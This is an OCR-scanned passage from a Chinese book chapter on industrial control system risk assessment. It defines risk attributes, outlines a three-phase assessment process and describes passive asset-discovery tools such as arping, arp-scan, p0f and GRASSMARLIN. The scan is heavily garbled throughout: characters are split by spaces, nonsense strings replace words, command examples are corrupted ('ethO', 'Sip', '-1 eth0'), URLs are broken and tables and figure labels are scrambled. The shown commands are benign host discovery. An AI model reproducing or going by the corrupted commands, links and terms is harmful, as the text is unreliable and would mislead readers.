- 可 能 性 (likelihood) : 可 能 性 指 的 是 威胁 事件 最 终 成 功 对 目标 对 象 造 成 影响 的 概率 。 后 果 和 影响 通常 被 看 作 是 一 回 事 ， 但 是 在 工控 系统 风险 评估 中 ， 它 们 
拥有 各 自 不 同 的 特点 : 


- 后 果 (consequence) : 后 果 是 指 威 胁 事件 的 直接 结果 。 上 有 具体 就 工控 系统 而 言 ， 通 常 意 味 着 系统 不 再 按照 预定 用 途 运行 (Plier, RERA PE BB. 
爆炸 或 者 任意 代码 执行 ) 。 


“影响 (impact) : 影响 是 指 威胁 事件 的 后 果 对 业务 、 运 行 、 收 入 、 环 境 等 要 素 的 影响 程度 。 
如 果 我 们 能 够 有 效 地 对 这 些 属性 进行 评估 与 度量 ， 那 么 正如 风险 的 概念 所 指出 的 那样 ， 我 们 应 该 有 一 个 整体 性 更 强 、 综 合 程度 更 高 的 过 程 ， 帮 助 我 们 确定 资 


产 和 系统 的 风险 等 级 ， 并 最 终 确定 功能 安全 、 和 后 产 系统 和 业务 系统 的 风险 等 级 。 紧 接着 ， 对 风险 进行 评估 与 度量 的 效果 越 好 ， 风 险 缓解 策略 的 效率 与 成 本 效益 也 
束 越 高 。 许 多 公司 都 忽视 了 对 风险 缓解 措施 进行 适当 的 优先 级 排序 ， 这 也 正 是 风险 缓解 预算 和 资源 如 此 捉襟见肘 的 原因 之 一 。 


2.1.4 工控 系统 风险 评估 过 程 概述 


那么 ， 如 何 有 效 地 评估 和 度量 这 些 属性 呢 ? 首先 ， 必 须 使 用 周密 筹划 、 人 全面、 系统 的 方法 针对 每 个 属性 采集 所 需 的 数据 。 该 过 程 需要 具有 一 定 的 弹性 和 可 重 
复 性 ， 因 为 可 能 需要 在 多 个 系统 中 执行 很 多 次 相同 的 步骤 ， 也 可 能 会 定期 (至 少 是 应 该 定期 ) 开展 整个 风险 评估 流程 。 接 下 来 ， 如 果 只 是 简单 地 收集 所 有 这 些 数 
据 ， 然 后 将 其 导入 电子 表格 或 者 评分 系统 是 远 远 不 够 的 。 还 需要 对 威胁 、 漏 洞 、 攻 击 方 法 和 工控 系统 ， 以 及 它们 之 间 的 关联 方式 有 充分 的 了 解 。 这 正 是 威胁 建 模 
发 挥 作用 的 地 方 ， 将 收集 到 的 所 有 信息 聚合 起 来 并 同 适 当 的 风险 属性 建立 关联 ， 进 而 组 合成 为 “攻击 树 ”， 最 终 用 于 构建 可 行 的 风险 场景 。 威 胁 建 模 是 工控 系统 
风险 评估 中 最 被 忽视 的 步骤 之 一 。 但 是 ， 如 果 用 户 的 目标 是 通过 评估 风险 场景 而 不 是 评估 单个 脆弱 性 和 (或 ) 同 标准 要 求 之 间 的 “差距 ”来 制订 有 针对 性 的 、 高 
效 的 缓解 策略 (本 来 也 应 当 这 样 做 ) ， 那 么 这 一 步骤 全 天 重要 。 


Os 


当 进 行 渗透 测 斌 时， 显然 需要 合格 的 渗透 测试 人 人员。 渗透 测 试 人 员 在 威胁 建 模 过 程 中 能 带 来 很 大 的 便利 。 渗 透 测 试 人 员 对 于 漏洞 、 漏 洞 利用 及 攻击 方法 的 知 
识 储 备 和 理解 在 威胁 建 模 阶段 是 一 笔 宝贵 的 财富 。 


图 2-1 展 示 了 一 个 全 面 的 风险 评估 过 程 所 涉及 的 三 个 主要 阶段 。 


识别 潜在 目标 对 象 资产 识别 与 系统 评定 


RIR TERI PE, AA 


向 量 、 威 胁 源 和 威胁 事件 ， 脆弱 性 识别 与 威胁 建 模 
并 估计 可 能 性 


计算 潜在 影响 风险 计算 与 管理 


图 2-1 ”从 较 高 层次 来 审视 的 工控 系统 风险 评估 过 程 


oy 


从 技术 上 来 说 ， 第 2 阶段 可 以 分 为 两 部 分 ， 即 脆弱 性 识别 与 威胁 建 模 。 但 是 ， 由 于 脆弱 性 识别 在 技术 上 是 威胁 建 模 过 程 中 的 一 个 必 不 可 少 的 组 成 部 分 ， 因 此 我 
们 将 三 者 放 在 一 起 。 另 外 ， 这 个 模型 只 是 对 过 程 加 以 组 织 的 一 种 方式 ， 目 的 是 帮助 读者 理解 风险 评估 。 用 户 也 可 以 按照 自己 的 理解 对 风险 评估 过 程 进 行 划 分 ， 只 
要 喜 括 了 所 涉及 的 每 个 步 又， 并 且 理 解 这 些 步骤 即 可 。 


每 一 阶段 代表 肝 一 特定 类 别 的 任务 或 步 又， 所 有 这 些 任 务 或 步骤 共同 致力 于 实现 风险 评估 共同 的 关键 功能 或 目标 。 简 单 地 这 ， 这 些 功 能 包括 : 
- 确定 需要 保护 的 内 容 。 

+ 确定 潜在 风险 。 

- 度量 发 生 的 可 能 性 及 其 潜在 影响 。 

- 确保 系统 设计 和 安全 控制 措施 根据 识别 的 风险 进行 优先 级 排序 。 

表 2-2 摘 述 了 每 个 阶段 的 目标 以 及 同 每 个 阶段 的 相关 联 风险 属性 。 


表 2-2 ”工控 系统 风险 评估 阶段 与 描述 


阶 OR 相关 风险 属性 描 R 


本 阶段 通过 对 系统 进行 分 类 、 资 产 识别 及 确定 资产 和 
系统 的 “关键 性 ”来 确定 所 要 评估 的 内 容 及 评估 顺序 ， 
并 根据 资产 识别 结 采 与 网 络 架 构 和 数据 流 的 审查 结 采 来 
界定 潜在 威胁 问 量 的 概念 


基于 第 1 阶段 得 到 的 数据 ， 本 阶段 对 脆弱 性 、 威 胁 源 、 
威胁 问 量 和 潜在 威胁 事件 等 内 容 进行 识别 ， 并 建立 其 与 
“攻击 树 ”、 可 行 的 风险 场景 以 及 后 果 之 间 的 关联 。 然 后 
使 用 渗透 测试 和 脆弱 性 评分 方法 来 对 发 现 的 漏洞 和 风险 
场景 进行 核实 验证 ， 进 而 计算 “可 能 性 ”属性 


本 阶段 将 从 脆弱 性 识别 与 威胁 建 模 阶 段 得 到 的 结果 进 
行 汇集 整理 与 计算 ， 进 而 构建 总 体 风 险 评分 或 评级 。 制 
辅助 属性 : 影响 研究 整改 和 缓解 控制 措施 并 进行 优先 
级 排序 ， 最 终 制订 风险 整改 或 缓解 计划 。 一 旦 控制 措施 
部 署 完成 ， 就 要 对 其 进行 验证 


主要 属性 : 目标 对 象 
辅助 属性 : 威胁 问 量 
后 果 、 影 响 


第 1 阶段 : 资产 识别 与 


评定 


主要 属性 : 脆弱 性 、 
第 2 阶段 : 脆弱 性 识别 | 威胁 源 、 威 胁 向 量 、 威 
与 威胁 建 模 胁 事 件 、 后 果 、 可 能 性 

辅助 属性 : 影响 


第 3 阶段 :风险 计算 与 
管理 


2.2 ”工控 系统 风险 评 人 过程 步 又 


我 们 已 经 对 工控 系统 风险 评估 过 程 、 阶 段 划 分 以 及 需要 评价 的 属性 从 一 个 较 高 的 层面 进行 了 讨论 ， 下 面 快速 浏览 一 下 风险 评估 过 程 所 涉及 的 每 个 步骤 。 这 里 
讨论 的 每 个 步骤 和 任务 ， 都 可 以 从 对 这 一 主题 提供 指导 的 众多 风险 评估 和 管理 标准 、 风 险 评估 最 佳 实践 以 及 其 他 出 版 物 中 找到 ， 尤 其 是 在 表 2-1 中 所 列 出 的 出 版 
物 。 但 是 ， 正 如 前 文 所 指出 的 那样 ， 我 们 的 目标 在 于 对 几 项 业界 公认 的 风险 评估 、 管 理 标准 和 出 版 物 中 所 常见 的 步骤 和 任务 进行 介绍 (凝练 出 其 核心 概念 ) ， 并 
提出 适用 于 工控 系统 的 指导 方案 。 图 2-2 说 明了 所 涉及 的 每 个 步 又 以 及 步骤 与 整体 风险 评估 过 程 中 的 各 个 阶段 之 间 的 关联 。 


Os 


图 2-2 中 所 描述 的 和 本 书 中 所 讨论 的 过 程 并 不 需要 严格 遵循 图 中 所 示 的 顺序 。 许 多 机 构 可 能 会 选择 以 不 同 的 顺序 来 执行 某 些 步 又 ， 而 且 很 多 步骤 可 以 并 行 完 
成 。 这 没有 任何 问题 ， 甚 至 我 们 也 建议 这 么 做 ， 因 为 并 行 开 展 能 够 帮助 加 快 评 估 过 程 (只 要 拥有 足够 人 手 ) 。 需 要 注意 的 重要 地 方 在 于 任务 本 身 、 任 务 如 何 执 
行 ， 以 及 它们 如 何 为 整个 过 程 和 最 终结 果 提 供 信 息 。 


业务 或 n 
运营 目标 定义 资产 识别 


网 络 拓扑 
与 数据 流 审查 


资产 识别 与 评定 


Ap 


脆弱 性 识别 


网 络 用 弹性 评估 | 人 控制 分 析 《 标 准 安全 策略 审查 


审计 、 差 距 分 析 ) 
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_ 攻击 树 或 漏洞 与 场景 验证 
威胁 评 售 风险 场景 构建 CAAM, CVSS); 


Wate 缓解 措施 优先 
风险 计算 与 管理 


图 2-2 ”工控 系统 风险 评估 步骤 


每 个 步骤 都 需要 收集 并 提供 信息 ， 这 些 信息 对 于 在 整个 风险 评估 过 程 中 进一步 完成 其 他 步骤 至 关 重 要 。 例 如 ， 资 产 识别 以 及 网 络 染 构 与 数据 流 审 查 两 个 步 又 
提供 了 用 于 攻击 向 量 识别 的 关键 信息 。 而 将 攻击 向 量 与 潜在 威胁 源 以 及 其 他 步骤 中 所 识别 出 的 脆弱 性 相 结 合 时 ， 则 是 在 开始 积累 界定 攻击 树 概念 所 需 的 所 有 信息 
了 ， 并 最 终 用 于 构建 风险 场景 。 然 后 使 用 渗透 测试 (如 果 适 用 的 话 ) 和 (或 ) CVSS 评 分 系统 ( 稍 后 讨论 ) 对 风险 场景 进行 评估 和 验证 。 最 后 ， 对 前 面 的 结果 进行 
计算 得 到 最 终 的 风险 评分 。 这 一 过 程 的 根本 在 于 : 


- 每 个 步骤 收集 和 评估 的 信息 越 多 ， 风 险 场 景 构建 起 来 就 越 恰 当 、 越 准确 。 
风险 场景 越 准确 ， 风 险 评分 就 会 越 准确 。 


- 风险 评分 越 准确 ， 制 订 风 险 管 理 策略 的 针对 性 就 越 强 、 有 效 性 和 成 本 效益 就 越 高 。 


Oz 


开展 更 加 准确 的 风险 评估 ， 除 了 能 够 增强 安全 性 ， 还 能 帮助 制订 更 高 效 的 风险 缓解 策略 ， 这 是 货真价实 的 商业 价值 。 商 业 价 值 有 助 于 益 明 投资 回报 率 (Return 
On Investment, ROI) ， 而 投资 回报 率 之 前 通常 很 难 与 安全 性 扯 上 关系 。 


下 面 让 我 们 来 深入 了 解 一 下 风险 评估 过 程 中 涉及 的 各 个 步骤 ， 通 过 这 些 步骤 我 们 能 够 有 效 地 收集 、 评 佑 和 度量 与 每 个 风险 属性 相关 的 信息 。 
2.2.1 第 1 阶段 : 资产 识别 与 评定 


安全 界 有 一 名 格言: “如 果 你 不 知道 自己 拥有 什么 ， 那 么 你 束 无 法 对 其 实施 保护 。” (Youcan’ t protect what you don’ t know you have.) 虽然 “无 
法 保护 ”的 说 法 显得 有 些 绝对 ， 但 如 果 都 不 知道 所 要 保护 的 东西 是 什么 ,一 定 会 使 得 保护 措施 变 得 非常 困难 。 一 般 来 说 ， 这 也 是 “分 层 防 御 ” 和 “最 佳 实践 ” 开 
始 登 场 亮相 的 地 方 。 一 个 考虑 周全 的 、 有 针对 性 的 方法 肯定 比 漫 无 目的 地 投 网 然后 祈求 上 帝 保 佑 要 更 好 。 因 此 ， 第 一 组 任务 是 评定 或 者 识别 待 评估 系统 和 环境 中 
所 有 物理 的 和 逻辑 的 资产 。 


O- 


资产 识别 与 评定 阶段 在 很 大 程度 上 依赖 于 在 不 同步 又 中 对 现 有 文档 的 收集 。 即 便 其 中 很 多 步骤 是 在 其 他 步骤 之 后 执行 的 ， 我 们 也 建议 在 项 目的 开始 阶段 尽 可 
能 多 地 收集 这 些 文档 ， 黄 至 要 在 真正 用 到 这 些 文档 的 步骤 开始 之 前 就 着 手 收集 。 这 对 资产 所 有 者 而 言 通 第 更 容易 ， 这 样 当 进行 到 相关 步骤 时 ， 这 些 信息 早 就 已 经 
准备 好 了 ， 而 不 必 在 该 步骤 开始 时 再 花费 时 间 进 行 收集 整理 。 


步骤 1: 定义 业务 或 运营 目标 
天 联 风险 属性 GR. BH 


识别 和 和 了解 业 务 或 运营 目标 对 于 真正 理解 风险 可 能 对 业务 市 来 的 后 果 和 影响 至 关 重 要 。 因 此 ， 这 一 步骤 也 是 制订 适合 自己 的 风险 度量 标准 并 对 识别 出 的 风险 
进行 评分 的 基础 。 例 如 ， 企 业 如 何 营 利 ， 以 及 哪些 系统 对 于 营利 至 天 重要 ? 而 对 于 工控 系统 来 说 ， 企 业 生产 的 是 什么 ? 控制 系统 运行 和 和 (或 ) 实现 自动 化 的 过 程 
都 有 哪些 ”在 过 程 或 自动 化 环境 中 都 部 署 了 哪些 系统 来 文 持 这 一 过 程 y》 通 过 了 解 这 些 目标 ， 融 可 以 知道 哪些 系统 对 于 实现 目标 更 为 天 键 ， 哪 些 系统 可 能 提供 更 多 
的 辅助 功能 。 同 时 也 能 明确 ， 如 果 这 些 系统 按 计划 停止 运行 所 可 能 导致 的 部 分 潜在 后 果 。 


确定 目标 应 该 是 有 天 各 方 坐 企 一 起 面对面 共同 协商 讨论 的 过 程 ， 需 要 业务 经 理 、 资 产 所 有 者 、 资 产 托管 方 、 工 三 经 理 、 工 程 师 以 及 所 有 其 他 利益 相关 方 的 共 
同 参 与 。 结 合 对 目标 提供 支持 的 系统 (从 更 高 层次 来 看 ) 、 以 及 由 于 这 些 系统 故障 导致 的 潜在 后 果 ， 应 该 对 目标 作出 明确 的 定义 。 后 果 应 当 按 照 生 产 损失 、 豆 收 
损失 (其 中 可 能 还 包括 罚款 、 法 律 费 用 和 公 天 费用 等 ) 以 及 对 人 身 健康 与 安全 造成 的 影响 等 条 目 进 行 记 录 。 对 于 某 些 行业 而 言 ， 还 需要 考虑 环境 影响 。 需 要 记 住 
的 是 ， 在 这 一 点 上 ， 所 有 讨论 都 是 站 在 更 高 的 战略 层面 上 而 展开 的 。 


理解 术语 后 果 和 影响 之 间 的 差异 非常 重要 。 从 风险 评估 过 程 的 角度 来 看 ， 后 果 是 指 由 于 某 一 行为 、 条 件 或 事件 〈 如 情况 不 明 、 失 去 控制 、 停 电 、 爆 炸 等 ) 所 
导致 的 意外 结果 (通常 也 是 不 希望 发 生 的 ) 。 影 响 则 是 指 由 后 果 寻 致 的 可 以 加 以 衡量 的 损失 。 


步骤 2: 系统 评定 与 分 类 
天 联 风险 属性 ”目标 对 象 、 后 果 、 影 响 


基于 前 一 步骤 中 所 识别 出 的 业务 与 运营 目标 以 及 与 之 天 联 的 系统 ， 本 步骤 首先 对 实现 上 述 目标 所 需要 的 各 个 系统 进行 识别 与 评定 ， 然 后 再 找 出 可 能 与 这 些 系 
统 相关 联 的 潜在 事件 和 后 果 ， 最后， 建立 所 导致 的 后 果 与 业务 目标 之 间 的 关联 ， 以 便 根据 系统 关键 性 (system criticality) 对 其 进行 分 类 与 优先 级 排序 。 GRE 
之 ， 如 果 资 产 受 损 、 离 线 或 者 被 滥用 会 产生 什么 影响 ? ) 这 一 步骤 非常 重要 ， 因 为 用 户 最 先 想 要 解决 的 肯定 是 最 关键 的 风险 ， 进 而 将 网 络 安 全 预算 投入 到 这 一 问 
题 上 来 。 


系统 评定 与 分 类 通常 不 是 传统 业务 或 者 企业 IT 风 险 评估 的 重点 ， 但 这 一 步骤 在 工控 系统 风险 评估 过 程 中 构建 风险 场景 时 很 重要 ， 尤 其 是 制订 风险 缓解 策略 时 
特别 重要 。 在 传统 的 !T 环 境 中 ， 术 语系 统 (system) 通 音 用 于 摘 述 “计算 机 系统 ”， 例 如 服务 器 或 工作 站 。 然 而 ， 在 工控 系统 环境 中 ， 系 统 是 指出 于 一 个 共同 的 
目标 而 协同 工作 的 一 组 过 程 设 备 、 处 理 装置 及 计算 机 ， 例 如 健康 安全 和 环境 管理 系统 (HSE) 、 安 全 仪表 系统 (SIS) 、 蒸 汽 喷 射 系统 、 监 控 与 数据 采集 系统 
(SCADA) 等 。 每 套 系统 在 整个 工控 系统 环境 中 都 有 非常 具体 的 应 用 ， 因 此 同系 统 关 键 性 的 确定 崇 密 相关 ， 而 在 涉及 潜在 威胁 事件 和 后 果 方 面 的 风险 场景 中 也 是 
如 此 。 为 了 对 这 些 系统 进行 正确 地 识别 与 分 析 ， 显 然 首先 需要 深入 了 解 这 些 系 统 。 所 以 在 这 一 步骤 中 ， 必 须 携 同 工 控 系 统 专 家 (工程 师 、 主 题 专家 等 ) 一 起 参 
与 ， 而 且 待 评估 的 过 程 环境 的 资产 所 有 者 与 托管 方 也 要 参与 其 中 。 


对 一 次 成 功 工控 系统 攻击 事件 的 潜在 后 果 的 概念 加 以 界定 


此 时 ， 在 整个 过 程 中 用 户 的 目标 仅仅 是 在 系统 层面 上 对 一 般 概 念 上 的 后 果 场 景 进 行 评估 ， 来 帮助 系统 进行 优先 级 排序 。 这 一 过 程 也 可 以 与 工业 环境 中 所 谓 的 
危险 性 与 可 操作 性 研究 (HAZOP) 联系 起 来 (https://en.wikipedia.ofg/wiki/Hazatd_and_opetability_study) 。 在 考虑 潜在 后 果 时 ， 务 必 考 虑 以 下 情 


- 阻 断 或 延迟 通过 工控 系统 网 络 的 信息 流 ， 可 能 导致 工控 系统 操作 的 中 断 。 
` 对 指令 、 命 令 或 报警 阅 值 的 未 授权 改动 ， 可 能 会 损坏 、 禁 用 或 关闭 设备 ， 造 成 环境 影响 以 及 (AA) 人身 伤亡 。 
` 向 系统 操作 员 发 送 不 准确 的 信息 ， 意 图 掩盖 未 经 授权 的 改动 ， 或 者 意图 导致 操作 员 进 行 不 当 的 操作 ， 可 能 会 导致 产生 多 种 负面 影响 
工控 系统 软件 或 组 态 设 置 的 改动 ， 或 者 工控 系统 软件 感染 病毒 ， 可 能 产生 多 种 负面 影响 。 
干扰 设备 保护 系统 的 运行 ， 可 能 对 售 价 昂贵 且 难 以 替换 的 设备 的 安全 造成 影响 。 
. 干扰 功能 安全 保护 系统 的 运行 ， 可 能 造成 人 身 伤亡 。 


一 旦 建立 系统 同 潜在 后 果 之 间 的 关联 ， 也 就 为 每 项 资产 同安 全 事件 的 估算 成 本 和 其 他 影响 之 间 建 立 了 关联 。 这 通常 称 之 为 资产 的 “关键 性 ”评级 ， 在 NIST 
SP800-53 建 议和 NIST SP800-82 指 南 中 也 被 称 为 安全 保障 级 别 (Security Assurance Level, SAL) 。 这 一 工作 也 可 以 通过 估算 实际 成 本 (虽然 这 可 能 非常 困难 ) ， 或 
A a 
可 以 将 这 一 过 程 变 得 容 。 我 们 将 在 稍 后 的 控制 分 析 步 骤 中 对 CSET 进 行 介绍 。 同 时 ，CSET 的 问题 预 利 界 面 如 下 。 


1 ? 
information SA Í Questions 
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Confidentiality Integrity Availability 
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Instructions j i Capital Assets Economic Impact Environmental Cleanup 


For a worst-case scenario, estimate the potential cost of losing capital assets or the overall economic impact. 
(Consider the cost of site buildings, facilities, equipment, etc.) 
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CSET 中 安全 保障 级 别 评级 工具 最 初 的 作用 是 帮助 建立 符合 NIST SP800-53 建 议 的 安全 保障 级 别 。 不 过 我 们 发 现 它 也 可 以 作为 一 个 非常 棒 的 风险 预 得 工具 。 


在 确定 成 本 之 后 ， 根 据 其 关键 性 评级 就 可 以 对 资产 进行 分 类 和 优先 级 排序 了 。 


Oz 


在 计算 该 成 本 时 ， 显 然 应 当 包 括 诸如 生产 损失 、 营 收 损失 、 环 境 清 理 成 本 和 设备 更 换 成 本 等 内 容 。 但 其 实 也 应 当 包 括 无 形成 本 ， 例 如 事件 响应 时 间 与 成 本 、 
公关 成 本 、 法 律 费 用 、 罚 款 等 等 。 讨 论 这 些 内 容 时 一 定 要 让 资产 所 有 者 、 各 利益 相关 方 和 业务 经 理 也 参与 进来 。 


天 联 风 险 属 性 目标 对 象 、 攻 击 向 量 

尽 可 能 全 面 地 识别 出 所 有 资产 (硬件 资产 以 及 软件 等 逻辑 资产 ) 无 疑 是 至 关 重要 的 。 然 而 ， 收 集 
漏 。 许 多 机 构 ， 尤 其 是 大 型 机 构 ， 可 能 并 没有 准确 的 资产 清单 。 在 评估 的 开始 阶段 进行 文件 收集 只 
证 。 资 产 清 单 的 收集 与 验证 可 以 通过 以 下 方式 来 进行 : 查询 采购 记录 、 现 有 资产 列表 与 数据 库 、 资 
行 交 叉 验 证 ， 人 工 巡 视 (尽管 这 在 超大 型 环境 中 不 太 可 行 ) 以 及 使 用 资产 发 现 工具 。 
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列 出 一 份 准确 的 、 最 新 的 清单 一 直 以 来 对 于 很 多 工控 系统 环境 来 说 都 是 非常 困难 的 。 除 了 为 风险 评估 过 程 提供 必要 的 信息 之 外 ， 本 步骤 也 可 以 帮助 弥补 这 些 
环境 中 较为 常见 的 不 足 之 处 。 


资产 清单 以 及 文件 的 过 程 可 能 比较 困难 ， 并 且 往 往 会 有 所 遗 
应 该 被 看 作 是 相关 工作 的 起 点 ， 并 且 应 当 对 其 准确 性 进行 验 
资产 管理 工具 中 所 存储 的 信息 ， 与 最 新 的 、 准 确 的 网 络 拓扑 图 进 


o 


许多 出 版 物 都 对 资产 识别 工具 和 技术 提供 了 一 般 性 的 指导 。 本 文 所 提供 的 指导 主要 针对 工控 系统 的 资产 识别 。 


© 


在 工控 系统 环境 中 ， 当 用 到 资产 发 现 工具 时 ， 强 烈 建 议 使 用 被 动 扫 描 工 具 和 (或) 能够 “保障 工控 系统 安全 ”的 技术 ， 而 不 要 采用 主动 扫描 的 方式 。 大 多 数 
能 源 机 构 的 资产 所 有 者 甚至 完全 不 同意 在 他 们 的 生产 网 络 中 运行 主动 工具 。 


niet 


eA 
[=] 


1. 命 令 行 主 机 识别 技术 


对 于 资产 或 主机 识别 技术 而 言 ， 在 借助 诸如 Nmap 和 hping 之 类 的 工具 、 甚 至 类 似 于 Nessus 的 多 用 途 工 具 进行 识别 方面 ， 已 经 有 大 量 参考 文献 进行 了 相关 介 
绍 。 然 而 ， 其 中 的 大 多 数 技术 均 使 用 主动 扫描 方法 将 外 部 流量 引入 到 网 络 当 中 。 这 种 方式 在 工控 系统 环境 中 极为 不 可 取 ， 因 此 需要 一 种 能 够 保障 工控 系统 安全 的 
识别 技术 。 下 面 通过 例子 来 介绍 几 个 命令 行 工具 ， 这 些 命令 行 工 具 能 够 在 工业 网 络 中 以 保障 工控 系统 安全 的 方式 以 及 (或 者 ) 被 动 方式 来 识别 活动 主机 。 所 有 这 
些 示例 都 能 够 以 root 权 限 在 Linux 主 机 上 运行 。 但 是 ， 这 些 命令 在 操作 系统 中 执行 之 前 ， 一 定 要 在 离线 环境 (例如 测试 与 开发 实验 环境 ) 中 进行 测试 。 

- atping 借 助 工具 arping (https:/ /github.com/ThomasHabets/atping 或 https://github.com/iputils/iputils) 能 够 向 单个 目标 发 送 单个 ARP 请 求 数据 包 ， 进 而 识别 活动 
主机 和 设备 。ARP 流 量 在 所 有 基于 IP 协 议 进行 通信 的 以 太 网 中 都 是 本 地 事件 。 任 何 具 有 JIP 地 址 的 工控 系统 设备 都 会 不 定期 地 接收 到 ARP 请 求 ， 并 且 能 够 处 理 利 用 本 
技术 发 送 的 适量 请 求 。 如 下 所 示 ， 每 次 发 送 请 求 数据 包 时 应 该 只 包含 对 一 个 IP 地 址 的 请 求 ， 且 中 间 要 间隔 一 段 合理 的 时 间 。 换 名 话说 就 是 ， 谁 都 不 想 在 自己 的 工 
控 系 统 网 络 中 出 现 “ARP 风 暴 ，。 当 然 了 ， 这 一 过 程 枯 燥 乏 味 并 且 耗 时 比较 多 ， 所 以 可 以 编写 脚本 实现 这 一 过 程 的 自动 化 。 


# arping -i ethO -c 1 192.168.50.1 


下 面 是 基于 同样 的 技术 利用 “一 句 话 ”Bash 脚 本 实现 的 例子 ， 借 助 该 脚本 能 够 实现 向 一 串 IP 地 址 列表 自动 地 发 送 ARP 请 求 ， 每 个 请 求 之 间 有 5 秒 钟 的 间 隅 时 
间 。 选 项 -i eth0 表 示 接 口 ，ipaddresses.txt 是 包含 IP 地 址 列表 的 文件 ， 文 件 中 每 行 存 放 一 个 jp 地 址 。 用 户 还 可 以 根据 情况 通过 将 sleep5 更 改 为 任意 秒 数 来 调整 间 
隅 时 间 。 


# while read ip; do arping -1 eth0 -c 1 Sip; sleep 5; done < 


ipaddresses.txt 


-arp-scan atp-scan 工 具 可 用 于 “扫描 ”( 先 别 害 怕 ) 指定 网 络 接口 对 应 的 整个 子 网 。 请 注意 ， 此 工具 设置 时 间 是 以 毫秒 为 单位 ， 每 隔 5 秒 发 送 一 次 请 求 ， 也 
就 是 每 5000 毫 秒 发 送 一 次 请 求 (-i5000) ， 可 根据 用 户 喜 好 加 以 更 改 。 


# arp-scan -I etho -w -1 -1 5000 


arp-scan 命 令 还 可 以 采用 CIDR 表 示 法 (192.168.50.0/24) 来 指定 扫描 的 网 络 区 间 ， 并 且 不 一 定 需要 在 本 地 网 络 接口 上 进行 配置 。 当 现实 中 没有 目标 网 络 中 
的 IP 地 址 时 ， 这 一 工具 对 于 扫描 一 般 的 网 络 区 间 来 说 非常 有 用 。 


# arp-scan -I ethO -wv -i 1000 192.168.50.0/24 


下 面 的 链接 是 对 arp-scan 进 阶 用 法 的 一 个 非常 好 的 简短 介绍 ，http://www.black moreops.com/2015/12/31/use-arp-scan-to-find-hidden-devices-in-your-network/ o 


工具 arping 和 arp-scan 的 缺点 之 一 在 于 它们 只 会 告诉 你 对 于 某 一 |P 地 址 是 否 人 存在 活动 主机 或 设备 。 要 想 知 道 使 用 该 地 址 的 是 什么 类 型 的 主机 或 设备 ， 还 需要 
使 用 在 线 工 具 查 找 其 MAC 地 址 ， 例 如 Wireshark 的 OUI 查 找 工具 (https://www.wireshark.org/tools/oui-lookup.html) 。 用 户 也 可 以 编写 一 个 脚本 通过 查询 整 
个 OUI 数 据 库 (http://standards-oui.ieee.org/oui.txt) 与 结果 进行 比较 。 然 而 ， 这 种 方法 并 不 完美 ， 因 为 MAC 地 址 可 能 是 伪造 的 。 而 且 如 果 服 务 器 和 工作 站 使 
用 了 虚拟 化 技术 (例如 VMWare) ， 那 么 在 搜索 结果 中 返回 的 将 是 “VMWare，Inc.”。 但是， 有 一 个 工具 提供 了 一 个 更 加 可 靠 且 完全 被 动 的 选择 ， 那 就 是 pO0f， 


一 种 远程 操作 系统 指纹 被 动 识别 工具 。 


pOf (http://lcamtuf.coredump.cx/p0f3/) 用 于 针对 活动 资产 进行 指纹 识别 (fingerprinting， 也 就 是 识别 设备 和 (或 ) 操作 系统 的 类 型 ) ， 该 工具 是 我 最 
喜欢 的 命令 行 工 具 之 一 。 该 工具 目前 已 经 发 展 到 版 本 3， 它 是 一 个 完全 被 动 的 工具 ， 使 用 了 多 种 高 级 、 纯 被 动 识别 技术 来 实现 对 活动 资产 的 指纹 识别 。 p0f 具 有 高 
度 的 可 扩展 性 ， 运 行 速度 非常 快 ， 同 时 还 可 以 识别 许多 其 他 的 资产 属性 ， 比 如 正常 运行 时 间 、 目 标 设备 或 系统 运行 的 客户 端 和 服务 等 信息 。 除 了 用 于 资产 识别 之 
外 ，p0f 还 可 用 于 渗透 测试 中 的 侦察 、 日 常 网 络 监控 、 未 授权 网 络 连 接 与 设备 的 检测 、 为 防 滥用 工具 提供 指示 信息 以 及 进行 “网 络 ” 取 证 等 工作 。p0f 的 识别 结 
不 仅 可 以 导出 为 多 种 不 同 的 格式 用 于 后 续 分 析 ， 并 且 还 提供 了 一 套 API 用 于 与 其 他 工具 和 数据 库 进行 集成 。 


p0f 的 运行 非常 简单 ， 用 户 所 需要 做 的 只 是 设 定 接口 ， 其 他 使 用 选项 可 以 在 帮助 文件 或 手册 中 找到 。 不 过 p0f 的 一 个 缺点 是 ， 对 工业 协议 和 设备 的 文 持 还 不 完 


善 ， 至 少 目前 是 这 样 。 


# pOf -i etho 
O. 


请 记 住 ， 如 果 想 要 “查看 ”网 络 中 的 所 有 流量 ， 用 户 需要 连接 到 交换 机 上 的 镜像 端口 (例如 ，span 端 口 或 monitor 端 口 ) 。 


2. 商 业 被 动 资产 识别 工具 


除了 命令 行 工 具 ， 基 于 被 动 扫 摘 方法 的 商业 软件 也 已 经 开始 出 现 ， 其 中 有 些 软件 甚至 是 专门 针对 工控 系统 环境 而 开发 的 。 这 些 工 具 同 前 面 讨论 过 的 工具 相 比 
更 加 先进 。 它 们 都 有 自己 的 “独门 利器 ”， 例 如 图 形 用 户 界面 (GUI) 、 配 置 选项 、 分 析 功 能 等 特性 。 事 实 上 ， 由 于 本 章 篇 幅 有 限 ， 不 可 能 涵盖 所 有 细节 。 
此 ， 我 们 鼓励 读者 根据 自己 的 需要 去 评估 这 些 工 具 ， 以 决定 它们 是 否 合适 。 当 然 ， 除 了 我 们 在 这 里 列 出 的 工具 之 外 (大 多 可 以 划 进 “人 态势 感知 ” 类别) ， 肯 定 还 
有 很 多 其 他 的 被 动 资产 识别 程序 ， 以 下 工具 都 是 工控 系统 专业 领域 的 佼佼 者 (在 撰写 本 书 时 ) : 


- Sophia by NexDefense (http://www.nexdefense.com/products-and-services/sophia/ ) 
- Cyberlens by Dragos Security (https://www.dragossecurity.com/products/cyberlens ) 
* Indegy (https://www.indegy.com/) 

- ICS Ranger by Team8 (http://www.team8.vc/) 

- XSense by CyberX Labs (http: //cyberx-labs.com/xsense/ ) 

- CylanceProtect by Cylance (https://www.cylance.com/) 


3.GRASSMARLIN 


最 后 ，2016 年 初 ， 美 国 国家 安全 局 发 布 了 GRASSMARLIN 工 具 。GRASSMARLIN 是 一 款 免费 的 专门 针对 工业 网 络 的 被 动 网 络 映射 工具 ， 并 且 最 近 开 放 了 源 代 
码 (https://github.com/iadgov/GRASSMARLIN) 。 是 的 ， 免 费 并 且 开 源 (根据 GNU 通 用 公共 许可 证 版 本 3 许可 ) 。GRASSMARLIN 能 够 提供 工控 系统 环境 
的 “快照 ”， 包 括 联网 设备 、 设 备 之 间 的 通信 以 及 从 通信 流量 中 提取 的 元 数据 。 


